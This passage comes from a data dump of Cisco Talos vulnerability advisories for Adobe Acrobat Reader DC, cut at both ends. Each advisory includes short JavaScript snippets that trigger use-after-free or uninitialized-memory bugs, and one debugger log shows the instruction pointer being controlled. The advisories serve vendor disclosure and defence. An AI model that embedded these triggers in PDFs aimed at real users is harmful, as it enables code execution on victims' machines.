UserAddr UserSize - VirtAddr VirtSize)\n 2c1b3e04: 2c2fb000 8 - 2c2fa000 2000\n 66818e89 verifier!AVrfDebugPageHeapAllocate+0x00000229\n 77756206 ntdll!RtlDebugAllocateHeap+0x00000030\n 7771a127 ntdll!RtlpAllocateHeap+0x000000c4\n 776e5950 ntdll!RtlAllocateHeap+0x0000023a\n 5cdced43 MSVCR120!malloc+0x00000049 [f:\\dd\\vctools\\crt\\crtw32\\heap\\malloc.c @ 92]\n 5cdcee1c MSVCR120!operator new+0x0000001d [f:\\dd\\vctools\\crt\\crtw32\\heap\\new.cpp @ 59]\n 5772dff6 Annots!PlugInMain+0x0000a0f5\n 5772daf9 Annots!PlugInMain+0x00009bf8\n 577290b0 Annots!PlugInMain+0x000051af\n 57737e59 Annots!PlugInMain+0x00013f58\n 5774506e Annots!PlugInMain+0x0002116d\n 578dd7b9 Annots!PlugInMain+0x001b98b8\n 59b2b61a EScript!mozilla::HashBytes+0x0004afa4\n 59b2b505 EScript!mozilla::HashBytes+0x0004ae8f\n 578dd779 Annots!PlugInMain+0x001b9878\n 5774506e Annots!PlugInMain+0x0002116d\n \n\n### Timeline\n\n2018-04-16- Vendor Disclosure \n2018-07-10 - Public Release\n\n##### Credit\n\nDiscovered by Aleksandar Nikolic of Cisco Talos.\n\n* * *\n\nVulnerability Reports Next Report\n\nTALOS-2018-0590\n\nPrevious Report\n\nTALOS-2018-0624\n", "edition": 4, "modified": "2018-07-10T00:00:00", "published": "2018-07-10T00:00:00", "id": "TALOS-2018-0569", "href": "http://www.talosintelligence.com/vulnerability_reports/TALOS-2018-0569", "title": "Adobe Acrobat Reader DC Collab.drivers Remote Code Execution Vulnerability", "type": "talos", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T19:20:02", "bulletinFamily": "info", "cvelist": ["CVE-2018-4947"], "description": "# Talos Vulnerability Report\n\n### TALOS-2018-0518\n\n## Adobe Acrobat Reader DC ANFancyAlertImpl Remote Code Execution Vulnerability\n\n##### May 15, 2018\n\n##### CVE Number\n\nCVE-2018-4947\n\n### Summary\n\nA specific Javascript script embedded in a PDF file can lead to a pointer to previously freed object to be reused when opening a PDF document in Adobe Acrobat Reader DC 2018.009.20044. With careful memory manipulation, this can potentially lead to sensitive memory disclosure or arbitrary code execution. In order to trigger this vulnerability, the victim would need to open the malicious file or access a malicious web page.\n\n### Tested Versions\n\nAdobe Acrobat Reader DC 2018.009.20044\n\n### Product URLs\n\n<https://get.adobe.com/reader/>\n\n### CVSSv3 Score\n\n6.8 - CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:H\n\n### CWE\n\nCWE-908: Use of Uninitialized Resource\n\n### Details\n\nAdobe Acrobat Reader is the most popular and most feature-rich PDF reader. It has a big user base, is usually a default PDF reader on systems and integrates into web browsers as a plugin for rendering PDFs. As such, tricking a user into visiting a malicious web page or sending a specially crafted email attachment can be enough to trigger this vulnerability. The method calls required to trigger this vulnerability are privileged and can only be called from trusted functions.\n\nAdobe Acrobat Reader DC supports embedded Javascript scripts in the PDF to allow for interactive PDF forms This give the potential attacker the ability to precisely control memory layout and poses additional attack surface.\n\nWhile executing a following piece of javascript code a specific condition leading to memory corruption can occur (it should be noted that all three of these lines require higher privileges, meaning they must be executed in a trusted PDF file):\n \n \n var a = this.Collab.drivers;\n this.SetRSSMethods( ); \n this.ANFancyAlertImpl(this);\n \n\nUpon calling `this.ANFancyAlertImpl(this)` a memory object will be allocated. The pointer to this object is later passed to other functions without it being initialized. This leads to undefined behaviour that depends on the previous contents of the same memory region, leading to memory corruption and ultimately to arbitrary code execution.\n\nTwo pointers from the object end up being used as second two arguments in a `memcpy` call which can easily be abused to cause a heap-based buffer overflow:\n \n \n (660.8f0): Access violation - code c0000005 (first chance)\n First chance exceptions are reported before any exception handling.\n This exception may be expected and handled.\n DC\\Reader\\plug_ins\\Annots.api\n Reader DC\\Reader\\plug_ins\\Annots.api - \n eax=81818180 ebx=c0c0c0c0 ecx=c0c0c0c0 edx=c0c0c0c0 esi=c0c0c0c0 edi=36dbafe0\n eip=645ff26d esp=001ac70c ebp=001ac738 iopl=0 nv up ei pl nz na po cy\n cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00210203\n MSVCR120!memcpy+0x2a:\n 645ff26d f3a4 rep movs byte ptr es:[edi],byte ptr [esi]\n 0:000> k\n # ChildEBP RetAddr \n 00 001ac710 7748e62e MSVCR120!memcpy+0x2a [f:\\dd\\vctools\\crt\\crtw32\\string\\i386\\memcpy.asm @ 188] \n WARNING: Stack unwind information not available. Following frames may be wrong.\n 01 001ac738 7748e5a2 Annots!PlugInMain+0xa72d\n 02 001ac760 7748e3c6 Annots!PlugInMain+0xa6a1\n 03 001ac770 776412e1 Annots!PlugInMain+0xa4c5\n 04 001ac780 774f7258 Annots!PlugInMain+0x1bd3e0\n 05 001ac7ac 570bd6b2 Annots!PlugInMain+0x73357\n 06 001ac81c 570c1c35 EScript!mozilla::HashBytes+0x2d050\n 07 001ac84c 5709387b EScript!mozilla::HashBytes+0x315d3\n 08 001ac8dc 570932df EScript!mozilla::HashBytes+0x3219\n 09 001ac8f8 570bd21d EScript!mozilla::HashBytes+0x2c7d\n 0a 001ac944 570bd1b0 EScript!mozilla::HashBytes+0x2cbbb\n \n\nStepping back a couple of function calls reveals where the `memcpy` arguments come from:\n \n \n 0:000> bp Annots!PluginMain+0x1bd3db b\n breakpoint 0 redefined\n 0:000> g\n Breakpoint 0 hit\n eax=267eef94 ebx=00000000 ecx=0030c438 edx=77898090 esi=1f266fc0 edi=2902efb8\n eip=776412dc esp=0030c414 ebp=0030c41c iopl=0 nv up ei pl zr na pe nc\n cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00200246\n Annots!PlugInMain+0x1bd3db:\n 776412dc e8cdd0e4ff call Annots!PlugInMain+0xa4ad (7748e3ae)\n 0:000> u eip-1\n Annots!PlugInMain+0x1bd3da:\n 776412db 50 push eax\n 776412dc e8cdd0e4ff call Annots!PlugInMain+0xa4ad (7748e3ae)\n 776412e1 8b4508 mov eax,dword ptr [ebp+8]\n 776412e4 8be5 mov esp,ebp\n 776412e6 5d pop ebp\n 776412e7 c20400 ret 4\n 776412ea 55 push ebp\n 776412eb 8bec mov ebp,esp\n 0:000> dd poi(eax)\n 26a5efe8 c0c0c0c0 c0c0c0c0 c0c0c0c0 c0c0c0c0\n 26a5eff8 c0c0c0c0 c0c0c0c0 ???????? ????????\n 26a5f008 ???????? ???????? ???????? ????????\n 26a5f018 ???????? ???????? ???????? ????????\n 26a5f028 ???????? ???????? ???????? ????????\n 26a5f038 ???????? ???????? ???????? ????????\n 26a5f048 ???????? ???????? ???????? ????????\n 26a5f058 ???????? ???????? ???????? ????????\n 0:000> !heap -p -a poi(eax)\n address 26a5efe8 found in\n _DPH_HEAP_ROOT @ 61000\n in busy allocation ( DPH_HEAP_BLOCK: UserAddr UserSize - VirtAddr VirtSize)\n 26954750: 26a5efb8 48 - 26a5e000 2000\n 6ac68e89 verifier!AVrfDebugPageHeapAllocate+0x00000229\n 77276206 ntdll!RtlDebugAllocateHeap+0x00000030\n 7723a127 ntdll!RtlpAllocateHeap+0x000000c4\n 77205950 ntdll!RtlAllocateHeap+0x0000023a\n 6326ed43 MSVCR120!malloc+0x00000049 [f:\\dd\\vctools\\crt\\crtw32\\heap\\malloc.c @ 92]\n 6326ee1c MSVCR120!operator new+0x0000001d [f:\\dd\\vctools\\crt\\crtw32\\heap\\new.cpp @ 59]\n 7748a048 Annots!PlugInMain+0x00006147\n 7748a00b Annots!PlugInMain+0x0000610a\n 7748daea Annots!PlugInMain+0x00009be9\n 774890a1 Annots!PlugInMain+0x000051a0\n 7748f546 Annots!PlugInMain+0x0000b645\n 774a5069 Annots!PlugInMain+0x00021168\n 7763d75e Annots!PlugInMain+0x001b985d\n 515db634 EScript!mozilla::HashBytes+0x0004afd2\n 515db51f EScript!mozilla::HashBytes+0x0004aebd\n 7763d6ab Annots!PlugInMain+0x001b97aa\n 774a5069 Annots!PlugInMain+0x00021168\n 7763d75e Annots!PlugInMain+0x001b985d\n 515db634 EScript!mozilla::HashBytes+0x0004afd2\n 515db51f EScript!mozilla::HashBytes+0x0004aebd\n 7763d6ab Annots!PlugInMain+0x001b97aa\n 774a5069 Annots!PlugInMain+0x00021168\n 774a4f71 Annots!PlugInMain+0x00021070\n 7762aaa2 Annots!PlugInMain+0x001a6ba1\n 7762aad8 Annots!PlugInMain+0x001a6bd7\n 77626588 Annots!PlugInMain+0x001a2687\n 7762af80 Annots!PlugInMain+0x001a707f\n 51f8ab90 AcroRd32!AIDE::PixelPartInfo::operator=+0x000e3210\n 515d267d EScript!mozilla::HashBytes+0x0004201b\n 515b75b6 EScript!mozilla::HashBytes+0x00026f54\n 515b17c2 EScript!mozilla::HashBytes+0x00021160\n 515b05f0 EScript!mozilla::HashBytes+0x0001ff8e\n \n\nIn the above debugging log, we break at `Annots!PluginMain+0x1bd3db` to reveal `eax` being passed as argument to the function call points to a newly allocated and uninitialized buffer. With page heap enabled, the contents of the allocated memory will be filled with `0xc0c0c0c0`.\n\nThe code and memory layout after corruption just happen to line up in such a way to allow for easy `eip` control by simply adjusting the size and contents of environment variables:\n \n \n # set AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=AAAAAAAAAAAAAAAAAAAAAAAA....\n # cdb \"c:\\Program Files\\Adobe\\Acrobat Reader DC\\Reader\\AcroRd32.exe\" \"c:\\Users\\user\\Desktop\\js_memcpy_min.pdf\"\n Microsoft (R) Windows Debugger Version 10.0.15063.468 X86\n Copyright (c) Microsoft Corporation. All rights reserved.\n \n \n CommandLine: \"c:\\Program Files\\Adobe\\Acrobat Reader DC\\Reader\\AcroRd32.exe\" \"c:\\Users\\user\\Desktop\\js_memcpy_min.pdf\"\n Symbol search path is: srv*\n Executable search path is:\n ModLoad: 013b0000 015d5000 AcroRd32.exe\n ModLoad: 771b0000 772f2000 ntdll.dll\n ModLoad: 75d80000 75e55000 C:\\Windows\\system32\\kernel32.dll\n ModLoad: 75340000 7538b000 C:\\Windows\\system32\\KERNELBASE.dll\n ModLoad: 75690000 75759000 C:\\Windows\\system32\\USER32.dll\n ModLoad: 75400000 7544e000 C:\\Windows\\system32\\GDI32.dll\n ModLoad: 75f50000 75f5a000 C:\\Windows\\system32\\LPK.dll\n ModLoad: 75450000 754ed000 C:\\Windows\\system32\\USP10.dll\n ModLoad: 758d0000 7597c000 C:\\Windows\\system32\\msvcrt.dll\n ModLoad: 75f60000 76001000 C:\\Windows\\system32\\ADVAPI32.dll\n ModLoad: 761b0000 761c9000 C:\\Windows\\SYSTEM32\\sechost.dll\n ModLoad: 75550000 755f2000 C:\\Windows\\system32\\RPCRT4.dll\n ModLoad: 75a40000 75a97000 C:\\Windows\\system32\\SHLWAPI.dll\n (8b0.3f8): Break instruction exception - code 80000003 (first chance)\n eax=00000000 ebx=00000000 ecx=001bf42c edx=771f6c74 esi=fffffffe edi=00000000\n eip=772505d9 esp=001bf448 ebp=001bf474 iopl=0 nv up ei pl zr na pe nc\n cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246\n ntdll!LdrpDoDebuggerBreak+0x2c:\n 772505d9 cc int 3\n 0:000> g\n ModLoad: 75e60000 75e7f000 C:\\Windows\\system32\\IMM32.DLL\n ModLoad: 753f0000 753f6000 C:\\Windows\\system32\\NSI.dll\n (8b0.3f8): C++ EH exception - code e06d7363 (first chance)\n ModLoad: 74f60000 74fac000 C:\\Windows\\system32\\apphelp.dll\n ModLoad: 64a70000 64ac1000 c:\\Program Files\\Adobe\\Acrobat Reader DC\\Reader\\sqlite.dll\n (8b0.3f8): Access violation - code c0000005 (first chance)\n First chance exceptions are reported before any exception handling.\n This exception may be expected and handled.\n eax=046503d8 ebx=00000000 ecx=046503d8 edx=06672fc8 esi=03f75478 edi=0656ffe8\n eip=41414141 esp=001bc14c ebp=001bc174 iopl=0 nv up ei pl nz na pe nc\n cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00210206\n 41414141 ?? ???\n \n\n### Crash Information\n\nCrash output with PageHeap enabled:\n \n \n First chance exceptions are reported before any exception handling.\n This exception may be expected and handled.\n *** WARNING: Unable to verify checksum for c:\\Program Files\\Adobe\\Acrobat Reader DC\\Reader\\plug_ins\\Annots.api\n *** ERROR: Symbol file could not be found. Defaulted to export symbols for c:\\Program Files\\Adobe\\Acrobat Reader DC\\Reader\\plug_ins\\Annots.api -\n eax=011716ce ebx=00000002 ecx=011716cc edx=011716cc esi=00000002 edi=37561000\n eip=6326f26d esp=0016c6f0 ebp=0016c71c iopl=0 nv up ei pl nz ac po cy\n cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00210213\n MSVCR120!memcpy+0x2a:\n 6326f26d f3a4 rep movs byte ptr es:[edi],byte ptr [esi]\n 0:000> k\n ChildEBP RetAddr\n 0016c6f4 7748e62e MSVCR120!memcpy+0x2a\n WARNING: Stack unwind information not available. Following frames may be wrong.\n 0016c71c 7748e5a2 Annots!PlugInMain+0xa72d\n 0016c744 7748e3c6 Annots!PlugInMain+0xa6a1\n 0016c754 776412e1 Annots!PlugInMain+0xa4c5\n 0016c764 774f7258 Annots!PlugInMain+0x1bd3e0\n *** WARNING: Unable to verify checksum for c:\\Program Files\\Adobe\\Acrobat Reader DC\\Reader\\plug_ins\\EScript.api\n *** ERROR: Symbol file could not be found. Defaulted to export symbols for c:\\Program Files\\Adobe\\Acrobat Reader DC\\Reader\\plug_ins\\EScript.api -\n 0016c790 515bd6b2 Annots!PlugInMain+0x73357\n 0016c800 515c1c35 EScript!mozilla::HashBytes+0x2d050\n 0016c830 5159387b EScript!mozilla::HashBytes+0x315d3\n 0016c8c0 515932df EScript!mozilla::HashBytes+0x3219\n 0016c8dc 515bd21d EScript!mozilla::HashBytes+0x2c7d\n 0016c928 515bd1b0 EScript!mozilla::HashBytes+0x2cbbb\n 0016c944 515c1a3e EScript!mozilla::HashBytes+0x2cb4e\n 0016c960 515c19d5 EScript!mozilla::HashBytes+0x313dc\n 0016c990 515db61f EScript!mozilla::HashBytes+0x31373\n 0016c9e4 515db51f EScript!mozilla::HashBytes+0x4afbd\n 0016c9fc 7763d6c7 EScript!mozilla::HashBytes+0x4aebd\n 0016ca3c 774a5069 Annots!PlugInMain+0x1b97c6\n 0016ca5c 774a4f71 Annots!PlugInMain+0x21168\n 0016ca9c 7763d663 Annots!PlugInMain+0x21070\n 0016cadc 774a5069 Annots!PlugInMain+0x1b9762\n 0016cafc 7763d75e Annots!PlugInMain+0x21168\n 0016cb2c 515db634 Annots!PlugInMain+0x1b985d\n \n\n### Timeline\n\n2018-01-23 - Vendor Disclosure \n2018-05-15 - Public Release\n\n##### Credit\n\nDiscovered by Aleksandar Nikolic of Cisco Talos.\n\n* * *\n\nVulnerability Reports Next Report\n\nTALOS-2017-0364\n\nPrevious Report\n\nTALOS-2018-0517\n", "edition": 5, "modified": "2018-05-15T00:00:00", "published": "2018-05-15T00:00:00", "id": "TALOS-2018-0518", "href": "http://www.talosintelligence.com/vulnerability_reports/TALOS-2018-0518", "title": "Adobe Acrobat Reader DC ANFancyAlertImpl Remote Code Execution Vulnerability", "type": "talos", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T19:19:55", "bulletinFamily": "info", "cvelist": ["CVE-2018-4996"], "description": "# Talos Vulnerability Report\n\n### TALOS-2018-0517\n\n## Adobe Acrobat Reader DC Net.Discovery.queryServices Remote Code Execution Vulnerability\n\n##### May 15, 2018\n\n##### CVE Number\n\nCVE-2018-4996\n\n### Summary\n\nA specific Javascript script embedded in a PDF file can lead to a pointer to previously freed object to be reused when opening a PDF document in Adobe Acrobat Reader DC 2018.009.20044. With careful memory manipulation, this can potentially lead to sensitive memory disclosure or arbitrary code execution. In order to trigger this vulnerability, the victim would need to open the malicious file or access a malicious web page.\n\n### Tested Versions\n\nAdobe Acrobat Reader DC 2018.009.20044\n\n### Product URLs\n\n<https://get.adobe.com/reader/>\n\n### CVSSv3 Score\n\n7.1 - CVSS:3.0/AV:N/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H\n\n### CWE\n\nCWE-416: Use After Free\n\n### Details\n\nAdobe Acrobat Reader is the most popular and most feature-rich PDF reader. It has a big user base, is usually a default PDF reader on systems and integrates into web browsers as a plugin for rendering PDFs. As such, tricking a user into visiting a malicious web page or sending a specially crafted email attachment can be enough to trigger this vulnerability. Adobe Acrobat Reader DC supports embedded Javascript scripts in the PDF to allow for interactive PDF forms. This give the potential attacker the ability to precisely control memory layout and poses additional attack surface. When executing a following piece of Javascript in a suitable PDF document, a Use-After-Free condition can be triggered:\n \n \n try{this.Net.Discovery.queryServices( \"\", {} ); }catch(e){app.alert(e);}\n \n\nWith page heap enabled, this leads to a crash:\n \n \n eax=17a6acb8 ebx=29464fe0 ecx=29464fe0 edx=771f6c74 esi=2a064fd8 edi=2a064fd0\n eip=520e2961 esp=0031f01c ebp=0031f02c iopl=0 nv up ei pl zr na pe nc\n cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246\n Annots!PlugInMain+0x9ea60:\n 520e2961 ff7318 push dword ptr [ebx+18h] ds:0023:29464ff8=????????\n 0:000>\n \n\nThe memory pointed to by `ebx` is freed an invalid, leading to a crash. The method `Net.Discovery.queryServices` requires privileges, and by default it would be blocked by security permissions. But if the source of the document is trusted, it will execute without problems and lead to a crash. In order to trigger a crash, the first argument needs to be an invalid service name. An empty string suffices.\n\nIf we track back the allocations, we can see that pointer in `ebx` is actually used as `this` in previous function calls. The pointer in `ebx` actually comes from an array of size 0x30 allocated at `Annots!PlugInMain+0x4c01`:\n \n \n 0:000> !heap -p -a eax\n address 292c2fd0 found in\n _DPH_HEAP_ROOT @ 191000\n in busy allocation ( DPH_HEAP_BLOCK: UserAddr UserSize - VirtAddr VirtSize)\n 292215b0: 292c2fd0 30 - 292c2000 2000\n 6b258e89 verifier!AVrfDebugPageHeapAllocate+0x00000229\n 77276206 ntdll!RtlDebugAllocateHeap+0x00000030\n 7723a127 ntdll!RtlpAllocateHeap+0x000000c4\n 77205950 ntdll!RtlAllocateHeap+0x0000023a\n 62f8ed43 MSVCR120!malloc+0x00000049\n 55848b02 Annots!PlugInMain+0x00004c01\n 55848ab1 Annots!PlugInMain+0x00004bb0\n 55a4ba1b Annots!PlugInMain+0x00207b1a\n 558e1e29 Annots!PlugInMain+0x0009df28\n 558e2308 Annots!PlugInMain+0x0009e407\n 56b4267d EScript!mozilla::HashBytes+0x0004201b\n 56b275b6 EScript!mozilla::HashBytes+0x00026f54\n 56b217c2 EScript!mozilla::HashBytes+0x00021160\n 56b205f0 EScript!mozilla::HashBytes+0x0001ff8e\n 56b204fb EScript!mozilla::HashBytes+0x0001fe99\n 56b20442 EScript!mozilla::HashBytes+0x0001fde0\n 56b09e18 EScript!mozilla::HashBytes+0x000097b6\n 56b48697 EScript!mozilla::HashBytes+0x00048035\n 56b4841a EScript!mozilla::HashBytes+0x00047db8\n 56b47e8d EScript!mozilla::HashBytes+0x0004782b\n 56b46d7f EScript!mozilla::HashBytes+0x0004671d\n 56bb622c EScript!double_conversion::DoubleToStringConverter::CreateDecimalRepresentation+0x0005f52d\n 6023b42f AcroRd32!AIDE::PixelPartInfo::operator=+0x000e3aaf\n 60179c7d AcroRd32!AIDE::PixelPartInfo::operator=+0x000222fd\n 601763b1 AcroRd32!AIDE::PixelPartInfo::operator=+0x0001ea31\n 5ffcd185 AcroRd32!AX_PDXlateToHostEx+0x00159618\n 5ffcd683 AcroRd32!AX_PDXlateToHostEx+0x00159b16\n 601799da AcroRd32!AIDE::PixelPartInfo::operator=+0x0002205a\n 5fc6426f AcroRd32!PDAlternatesGetCosObj+0x0001d51f\n 5fc2b14b AcroRd32!CTJPEGWriter::CTJPEGWriter+0x000b9c1b\n 5fba268b AcroRd32!CTJPEGWriter::CTJPEGWriter+0x0003115b\n 5fba1761 AcroRd32!CTJPEGWriter::CTJPEGWriter+0x00030231\n \n\nSetting a write access breakpoint on the dword where the final dereferenced pointer is stored reveals where it comes from:\n \n \n 0:000> ba w 4 292c2ffc\n 0:000> dd 292c2ffc\n 0:000> g\n Breakpoint 6 hit\n eax=29d26fe0 ebx=29d26fe0 ecx=55a494c0 edx=771f6c74 esi=28a2cff8 edi=292c2fd0\n eip=55a49408 esp=0018c9e4 ebp=0018ca0c iopl=0 nv up ei pl zr na pe nc\n cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246\n Annots!PlugInMain+0x205507:\n 55a49408 e86941e0ff call Annots!PlugInMain+0x9675 (5584d576)\n 0:000> dd 292c2ffc\n 292c2ffc 29d26fe0 ???????? ???????? ????????\n 0:000> !heap -p -a 29d26fe0\n address 29d26fe0 found in\n _DPH_HEAP_ROOT @ 191000\n in busy allocation ( DPH_HEAP_BLOCK: UserAddr UserSize - VirtAddr VirtSize)\n 2a3221d4: 29d26fe0 1c - 29d26000 2000\n 6b258e89 verifier!AVrfDebugPageHeapAllocate+0x00000229\n 77276206 ntdll!RtlDebugAllocateHeap+0x00000030\n 7723a127 ntdll!RtlpAllocateHeap+0x000000c4\n 77205950 ntdll!RtlAllocateHeap+0x0000023a\n 62f8ed43 MSVCR120!malloc+0x00000049\n 55848b02 Annots!PlugInMain+0x00004c01\n 55848ab1 Annots!PlugInMain+0x00004bb0\n 558e22e7 Annots!PlugInMain+0x0009e3e6\n 56b4267d EScript!mozilla::HashBytes+0x0004201b\n 56b275b6 EScript!mozilla::HashBytes+0x00026f54\n 56b217c2 EScript!mozilla::HashBytes+0x00021160\n 56b205f0 EScript!mozilla::HashBytes+0x0001ff8e\n 56b204fb EScript!mozilla::HashBytes+0x0001fe99\n 56b20442 EScript!mozilla::HashBytes+0x0001fde0\n 56b09e18 EScript!mozilla::HashBytes+0x000097b6\n 56b48697 EScript!mozilla::HashBytes+0x00048035\n 56b4841a EScript!mozilla::HashBytes+0x00047db8\n 56b47e8d EScript!mozilla::HashBytes+0x0004782b\n 56b46d7f EScript!mozilla::HashBytes+0x0004671d\n 56bb622c EScript!double_conversion::DoubleToStringConverter::CreateDecimalRepresentation+0x0005f52d\n 6023b42f AcroRd32!AIDE::PixelPartInfo::operator=+0x000e3aaf\n 60179c7d AcroRd32!AIDE::PixelPartInfo::operator=+0x000222fd\n 601763b1 AcroRd32!AIDE::PixelPartInfo::operator=+0x0001ea31\n 5ffcd185 AcroRd32!AX_PDXlateToHostEx+0x00159618\n 5ffcd683 AcroRd32!AX_PDXlateToHostEx+0x00159b16\n 601799da AcroRd32!AIDE::PixelPartInfo::operator=+0x0002205a\n 5fc6426f AcroRd32!PDAlternatesGetCosObj+0x0001d51f\n 5fc2b14b AcroRd32!CTJPEGWriter::CTJPEGWriter+0x000b9c1b\n 5fba268b AcroRd32!CTJPEGWriter::CTJPEGWriter+0x0003115b\n 5fba1761 AcroRd32!CTJPEGWriter::CTJPEGWriter+0x00030231\n 5fb860d4 AcroRd32!CTJPEGWriter::CTJPEGWriter+0x00014ba4\n 5fb85688 AcroRd32!CTJPEGWriter::CTJPEGWriter+0x00014158\n \n\nThis 0x1c chunk of memory is subsequently freed but is later reused resulting in a crash:\n \n \n (c20.5e8): Access violation - code c0000005 (first chance)\n First chance exceptions are reported before any exception handling.\n This exception may be expected and handled.\n eax=17d2acb8 ebx=29d26fe0 ecx=29d26fe0 edx=771f6c74 esi=292c2fd8 edi=292c2fd0\n eip=558e2961 esp=0018eee8 ebp=0018eef8 iopl=0 nv up ei pl zr na pe nc\n cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246\n Annots!PlugInMain+0x9ea60:\n 558e2961 ff7318 push dword ptr [ebx+18h] ds:0023:29d26ff8=????????\n 0:000> dd ebx\n 29d26fe0 ???????? ???????? ???????? ????????\n 29d26ff0 ???????? ???????? ???????? ????????\n 29d27000 ???????? ???????? ???????? ????????\n 29d27010 ???????? ???????? ???????? ????????\n 29d27020 ???????? ???????? ???????? ????????\n 29d27030 ???????? ???????? ???????? ????????\n 29d27040 ???????? ???????? ???????? ????????\n 29d27050 ???????? ???????? ???????? ????????\n \n\nWith page heap disabled, this stale pointer dereference will usually succeed and result in further memory corruption. With proper memory layout manipulation, it could be abused to achieve arbitrary code execution.\n\nDo note that in order for the PoC to trigger this memory corruption, the PoC file needs to be added to trusted locations list in \u201cSecurity(Enhanced)\u201d in preferences.\n\n### Timeline\n\n2018-01-23 - Vendor Disclosure \n2018-05-15 - Public Release\n\n##### Credit\n\nDiscovered by Aleksandar Nikolic of Cisco Talos.\n\n* * *\n\nVulnerability Reports Next Report\n\nTALOS-2018-0518\n\nPrevious Report\n\nTALOS-2017-0501\n", "edition": 6, "modified": "2018-05-15T00:00:00", "published": "2018-05-15T00:00:00", "id": "TALOS-2018-0517", "href": "http://www.talosintelligence.com/vulnerability_reports/TALOS-2018-0517", "title": "Adobe Acrobat Reader DC Net.Discovery.queryServices Remote Code Execution Vulnerability", "type": "talos", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T19:19:59", "bulletinFamily": "info", "cvelist": ["CVE-2018-12815"], "description": "# Talos Vulnerability Report\n\n### TALOS-2018-0592\n\n## Adobe Acrobat Reader DC JSON Stringify Remote Code Execution Vulnerability\n\n##### July 10, 2018\n\n##### CVE Number\n\nCVE-2018-12815 \n\n### Summary\n\nA specific JavaScript code embedded in a PDF file can lead to a use-after-free condition when opening a PDF document in Adobe Acrobat Reader DC 2018.011.20038. With careful memory manipulation, this can lead to arbitrary code execution. In order to trigger this vulnerability, the victim would need to open the malicious file or access a malicious web page.\n\n### Tested Versions\n\nAdobe Acrobat Reader DC 2018.011.20038\n\n### Product URLs\n\n<https://get.adobe.com/reader/>\n\n### CVSSv3 Score\n\n6.8 - CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:H\n\n### CWE\n\nCWE-416: Use After Free\n\n### Details\n\nAdobe Acrobat Reader is the most popular and most feature-rich PDF reader. It has a big user base, is usually a default PDF reader on systems and integrates into web browsers as a plugin for rendering PDFs. As such, tricking a user into visiting a malicious web page or sending a specially crafted email attachment can be enough to trigger this vulnerability. The one method call required to trigger this vulnerability is privileged, and can only be called from trusted functions or from a trusted location.\n\nAdobe Acrobat Reader DC supports embedded JavaScript code in the PDF to allow for interactive PDF forms. This gives the potential attacker the ability to precisely control memory layout, and poses additional attack surfaces.\n\nWhile executing the following piece of code, a cache misuse can lead to a dereference of a previously freed object, which can cause further memory corruption:\n \n \n this.Net.Subscriptions.addUI({},[],'b'); \n this.spell.languages;\n a = this.Collab.drivers;\n this.SetRSSMethods('a',{});\n JSON.stringify(a);\n \n\nWhile executing `JSON.stringify()` method on indirect reference to `this.Collab.drivers` object, an invalid pointer is retrieved, leading to a crash on the following address:\n \n \n (100c.174c): Access violation - code c0000005 (first chance)\n First chance exceptions are reported before any exception handling.\n This exception may be expected and handled.\n eax=253b8ef8 ebx=00000000 ecx=5ef4a370 edx=5ef4a378 esi=1def2fc0 edi=6e866fb8\n eip=5ebd7790 esp=001ac550 ebp=001ac570 iopl=0 nv up ei pl nz na po nc\n cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010202\n Annots!PlugInMain+0x7388f:\n 5ebd7790 8b10 mov edx,dword ptr [eax] ds:0023:253b8ef8=????????\n \n\nStepping back, we can see that pointer in `eax` comes from the following function call:\n \n \n 0:000> u eip-14\n Annots!PlugInMain+0x7387b:\n 5ebd777c 6870a3f45e push offset Annots!PlugInMain+0x3e646f (5ef4a370)\n 5ebd7781 ff7508 push dword ptr [ebp+8]\n 5ebd7784 ff90cc000000 call dword ptr [eax+0CCh]\n 0:000> da Annots!PlugInMain+0x3e646f\n 5ef4a370 \"CRSSFeedUI\"\n \n\nThis is an indirect call to cachehash methods in `EScript.api` referencing `CRSSFeedUI` object, and a pointer to a freed object is returned:\n \n \n 0:000> !heap -p -a eax\n address 253b8ef8 found in\n _DPH_HEAP_ROOT @ 1b1000\n in free-ed allocation ( DPH_HEAP_BLOCK: VirtAddr VirtSize)\n 252b14ac: 253b8000 2000\n 6b1e90b2 verifier!AVrfDebugPageHeapFree+0x000000c2\n 774969cc ntdll!RtlDebugFreeHeap+0x0000002f\n 77459e07 ntdll!RtlpFreeHeap+0x0000005d\n 774263a6 ntdll!RtlFreeHeap+0x00000142\n 7565c614 kernel32!HeapFree+0x00000014\n 6901ecfa MSVCR120!free+0x0000001a [f:\\dd\\vctools\\crt\\crtw32\\heap\\free.c @ 51]\n 610c524f EScript!PlugInMain+0x000026b0\n 610c5206 EScript!PlugInMain+0x00002667\n 61101c50 EScript!mozilla::HashBytes+0x000315da\n 610d388f EScript!mozilla::HashBytes+0x00003219\n 610d32f3 EScript!mozilla::HashBytes+0x00002c7d\n 611f5d4c EScript!double_conversion::DoubleToStringConverter::CreateDecimalRepresentation+0x000cf067\n 611f6342 EScript!double_conversion::DoubleToStringConverter::CreateDecimalRepresentation+0x000cf65d\n 611f5baf EScript!double_conversion::DoubleToStringConverter::CreateDecimalRepresentation+0x000ceeca\n 611f633b EScript!double_conversion::DoubleToStringConverter::CreateDecimalRepresentation+0x000cf656\n 611f7140 EScript!double_conversion::DoubleToStringConverter::CreateDecimalRepresentation+0x000d045b\n 611f518e EScript!double_conversion::DoubleToStringConverter::CreateDecimalRepresentation+0x000ce4a9\n 610f75ce 